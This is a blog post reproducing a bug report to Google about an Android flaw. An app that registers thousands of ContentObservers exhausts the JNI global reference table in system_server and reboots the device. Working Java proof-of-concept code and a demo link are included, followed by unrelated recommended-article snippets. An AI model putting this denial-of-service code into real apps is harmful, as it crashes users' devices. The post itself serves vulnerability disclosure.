Bug Report to Google of Android

最新推荐文章于 2025-04-28 16:58:59 发布
原创 最新推荐文章于 2025-04-28 16:58:59 发布 · 1.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

当恶意代码在一个应用程序中注册过多的ContentObserver时,会导致system_server创建大量的BinderProxy对象和JNI全局引用对象,从而引起JNI全局引用表溢出,最终使系统重启。此问题在特定条件下触发,详细代码及日志已附。

demo 地址

https://github.com/SundayCool/JNIoverflow

 

https://issuetracker.google.com/issues/117744552

When the malicious code in an APP to register too many ContentObserver, it will make system_server creates many Binder Proxy objects and JNI Glocal Reference objects which will lead to JNI global reference table overflow that makes system reboots.

Just as the code bellow, when the method onClick called in Line 32, system will reboot of JNI Error.
The log and demo code are attached.

  1 public class MainActivity extends ActionBarActivity
  2 implements OnClickListener{
  3
  4         class SettingsObserver extends ContentObserver {
  5             SettingsObserver(Handler handler) {
  6                 super(handler);
  7             }
  8
  9             void observe() {
 10                 ContentResolver resolver = getContentResolver();
 11                 resolver.registerContentObserver(
 12                                 Settings.System.getUriFor(Settings.System.ALARM_ALERT), false, this );
 13
 14                 updateSettings();
 15             }
 16             @Override
 17                 public void onChange(boolean selfChange) {
 18                 updateSettings();
 19             }
 20
 21             @Override
 22             protected void finalize() throws Throwable {
 23                 getContentResolver().unregisterContentObserver(this);
 24                 // TODO Auto-generated method stub
 25                 super.finalize();
 26             }
 27         }
 28
 29         public void updateSettings() {
 30         }
 31
 32         public void onClick(View src)
 33         {
 34                 try {
 35                         new Thread() {
 36                                 @Override
 37                                 public void run(){
 38                                         for (int i = 0; i < 25600; i++) {
 39                                                 SettingsObserver observer = new SettingsObserver(null);
 40                                                 observer.observe();
 41                                         }
 42                                 }
 43                         }.start();
 44
 45                 } catch (Exception e) {
 46                         // TODO: handle exception
 47                 }
 48
 49
 50         }
 51

如何通过 bugreport 分析 Android 系统日志?
wzkacyw的博客
02-10 1845
它包含了系统运行的各种关键日志,包括 main.log、event.log、ANR、Crash 等。通过 bugreport,我们可以快速分析 应用崩溃(Crash)、ANR(无响应)、系统事件(event.log),快速定位 Android 系统的问题。Crash(崩溃) 主要由于: ✅ 空指针异常(NullPointerException)main.log 主要记录 系统组件 & 应用的运行状态,包含: ✅ 应用启动 / 退出。ANR(应用无响应) 发生在: ✅ 主线程阻塞(耗时任务没放到子线程)
Bugreport 解读 Android电量统计原理
Wu_Being 的优快云 博客
03-07 6679
文章目录一. 电量值的获取和计算二. 应用功耗的计算方法第一部分:App耗电量统计:processAppUsage()三. 功耗问题分析定位及优化 应用商店中关于电池管理的应用做的极其绚烂,可耗电应用排行、剩余时间计算、关闭耗电程序以节省电量等功能是如何实现的,遇到功耗高的问题从哪些方面入手分析和定位,这里简要总结如下。 一. 电量值的获取和计算 首先解释下各软硬件耗电量的计算。假设设备(如WI...
android bugreport 分析
04-26
帮助你快速掌握如何分析android bugreport
android bug report tools
wys839348916的博客
12-16 1402
原文链接:点击打开链接 Making a basic Android app is easy. Making a reliable, scalable, and robust Android app, on the other hand, can be quite challenging. With thousands of available devices pu
Android分析Bugreport开源工具
11-15
ChkBugReport是一个用于分析androidbugreport的开源工具,它可以把你得到的bugreprot导出成适合阅读的html。导出的html文件包含了根据bugreport数据得出的图表和分析结论,主要包括进程内存占用信息、程序ANR或crash的堆栈信息、电池信息、CPU频率信息等等。更多详细内容可以参考文章http://www.androidlearner.net/using-chkbugreport-analysis-bugreport.html
Chrome的Crash Report服务
sundebing的专栏
12-08 2344
本文翻译自debugInfo网站上一篇文章generating debug information with visual c++。由于Chrome的Crash产生的Debug信息和这个有一些关系,因此做一些背景知识介绍简介当我们采用一个调试器调试一个应用程序时,我们总是希望能单步跟踪代码、设置断点、查看变量值,哪怕变量是自定义的用户类型。但是对于一个EXE程序来说,基本上就是一堆二进
深入探讨 Android 系统调试:Bugreport、Event Log、ANR Trace 详解
wzkacyw的博客
08-20 1054
BugreportAndroid 提供的一种调试工具,它生成的报告包含了设备运行状态的详细信息。设备基本信息:包括设备型号、构建版本、内核版本等。这些信息可以帮助你快速了解当前设备的硬件和软件环境,便于分析问题的背景。系统服务状态:展示了当前系统的运行状态,包括活动管理器(Activity Manager)中的任务栈信息。这部分信息对于分析系统级别的问题非常重要。系统日志:包括崩溃日志、应用异常(如 FATAL EXCEPTION)的堆栈跟踪。通过这些日志,你可以精确定位导致应用崩溃的原因。设备配置。
bugreport-Xiaomi 13 Ultra-2024-11-18-161524.zip
11-18
文件名“bugreport-ishtar-UKQ1.230804.001-2024-11-18-16-13-17.txt”指出了bug报告的归属设备(小米13 Ultra),报告编号以及具体的时间戳。这表明了该设备在2024年11月18日下午4点13分17秒遇到了问题,进而触发了...
2016-2017Android Phone Bug Report.rar
07-24
9. **硬件驱动问题**:特定硬件组件如相机、GPS或传感器的bug可能在报告中被记录,这些问题往往需要厂商与谷歌合作修复。 10. **修复流程与更新推送**:报告中的问题一旦被确认,通常会经历一系列的修复流程,包括...
bugreport、logcat、kernel、anr以及tombstones的log抓取
01-08
抓log的bat:bugreport、logcat、kernel、anr以及tombstones recovery文件,执行可以进行恢复出厂设置的压力测试
谷歌源生bug发现与解决记录
一个Android菜鸟的博客
12-20 662
最近发现了谷歌安卓源生的一个bug,在这里记录一下。 操作步骤: 1、进入拨号界面,输入 ##4636## ,然后会进入手机测试界面。 2、点击第三栏 Wi-Fi information 。 3、进入Wi-Fi information 界面后,点击第一栏 Wi-Fi API 。 4、进入Wi-Fi API 界面后,点击 enableNetwork 。这时会弹出一个输入栏,如果你输入为空或者输入为非...
Android12】Bugreport实现原理
林多
04-22 3782
Android Bugreport是一个用于记录和收集 Android设备上系统信息、日志和调试信息的工具。系统发生某些问题时,可以通过bugreport把系统当前时刻点(运行BugRepot的时刻)的系统相关的状态和信息都抓到一个zip中。通过bugreport可以帮忙开发人员分析和解决问题。Bugreport其实就是一系列的信息的汇总,包括日志、内存状态、进程信息、崩溃信息、服务状态等等。用一个大而近乎全的现场,来帮忙更好的分析问题。
Android FakeID(Google Bug 13678484) 漏洞详解
简行之旅
08-07 2万+
继上一次Masterkey漏洞之后,Bluebox在2014年7月30日又公布了一个关于APK签名的漏洞——FakeID,并打算在今年的Blackhack上公布更详细的细节,不过作者Jeff Forristal在文中已经给出了不少提示,另外申迪的《FakeID签名漏洞分析及利用》也做了相关介绍。由于其中涉及的知识点较多,所以有部分朋友估计还没有看明白,所以我打算写一篇更加详细漏洞分析解说。
Binder Java 层服务注册过程分析
chuyouyinghe的专栏
08-02 572
javaObjectForIBinder 函数 new 了一个 BinderProxy(Java 对象),其内部成员 mNativeData 是一个 native 层指针,指向一个 BinderProxyNativeData,BinderProxyNativeData 的成员 mObject 指向上述的 BpBinder。可以看出,绕了一圈还是通过 native 层的 BpBinder 发起远程调用,native 层的调用过程可以参考之前的文章Binder 服务注册过程情景分析之 C++ 篇。
java.lang.AssertionError: Binder ProxyMap has too many entries: 问题处理
qq_28987919的博客
04-28 369
异常栈: 抛出位置 原因:BinderProxy 代理过多 看logcat 其中占用过多 从Android源码发现中使用了这个类 猜测Toast调用过多导致移除过多的Toast显示,问题解决
Android系统进程间通信 IPC 机制Binder中的Server启动过程源代码分析
hfyugg的博客
11-07 295
Android系统进程间通信 IPC 机制Binder中的Server启动过程源代码分析
bugreport
蝉之洞
09-20 5178
转自:http://blog.youkuaiyun.com/baniel01/article/details/51954142 bugreport是什么,怎么用? Android系统想要成为一个功能完备,生态繁荣的操作系统,那就必须提供完整的应用开发环境。而在应用开发中,app程序的调试分析是日常生产中进程会进行的工作。Android为了方便开发人员分析整个系统平台和某个app在运行一
Android adb bugreport工具分析和使用
热门推荐
Android Fans
07-19 8万+
bugreport是什么,怎么用?Android系统想要成为一个功能完备,生态繁荣的操作系统,那就必须提供完整的应用开发环境。而在应用开发中,app程序的调试分析是日常生产中进程会进行的工作。Android为了方便开发人员分析整个系统平台和某个app在运行一段时间之内的所有信息,专门开发了bugreport工具。这个工具使用起来十分简单,只要在终端执行(linux或者win):adb bugrepo
android bugreport 分析工具
最新发布
07-05
<think>我们正在寻找能够分析Android设备bugreport的工具。根据引用内容,有两个主要工具被提及: 1. Google的Battery Historian:专门用于分析电池消耗,但也可以用于其他bugreport分析。 2. Sony开源的ChkBugReport:提供另一种视角解读bugreport文件,界面简单明了。 此外,引用[2]提到了一些功能,如按时间单位绘制报告数量、查看报告分布(按Android版本、SDK版本等)、列出崩溃报告和查看错误详情等。 因此,推荐的Android bugreport分析工具包括: - Battery HistorianGoogle官方工具) - ChkBugReport(Sony开源工具) 用户可以根据需求选择使用,甚至可以结合两者使用以获得更全面的分析。</think>### Android Bugreport分析工具推荐 分析Android设备的bugreport文件主要有以下专业工具: #### 1. **Battery Historian**(Google官方工具) - **功能**:专门分析电池消耗问题,可视化展示系统状态(如CPU唤醒锁、网络状态、传感器使用等) - **特点**: - 支持时间线图表展示$t$($t$为时间变量) - 可关联系统事件与电池消耗曲线 - 需通过Docker部署服务端 - **使用场景**:定位电池异常消耗、系统唤醒问题 - **项目地址**:[github.com/google/battery-historian](https://github.com/google/battery-historian) #### 2. **ChkBugReport**(Sony开源工具) - **功能**:提供结构化解析报告,包含: ```plaintext - 系统服务状态 (dumpsys) - 进程资源占用 (meminfo, cpuinfo) - 异常堆栈追踪 (stack traces) - 日志时间线 (timeline logging) ``` - **特点**: - 单文件可执行程序(无需部署) - 生成HTML交互式报告 - 支持错误分类统计$S=\sum_{i=1}^{n} error_i$ - **项目地址**:[github.com/sonyxperiadev/ChkBugReport](https://github.com/sonyxperiadev/ChkBugReport) - **注意**:建议与Battery Historian结合使用[^1] #### 3. **在线分析平台** - **Firebase Crashlytics**: ```mermaid graph LR A[上传bugreport] --> B(自动聚合相同错误) B --> C[可视化设备分布] C --> D[堆栈反混淆] ``` - **功能**: - 跨版本错误追踪 - 用户影响面统计$P=\frac{affected\_users}{total\_users} \times 100\%$ - 支持自定义过滤条件 #### 工具对比表 | 工具 | 部署难度 | 分析深度 | 实时监控 | 适用场景 | |-------------------|----------|----------|----------|-------------------| | Battery Historian | 中等 | ★★★★☆ | ❌ | 电池/系统性能分析 | | ChkBugReport | 简单 | ★★★☆☆ | ❌ | 快速问题定位 | | Firebase | 无需部署 | ★★★★★ | ✅ | 线上崩溃监控 | > **最佳实践**:开发调试建议使用ChkBugReport快速定位问题,线上监控推荐Firebase实现自动化分析[^2]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值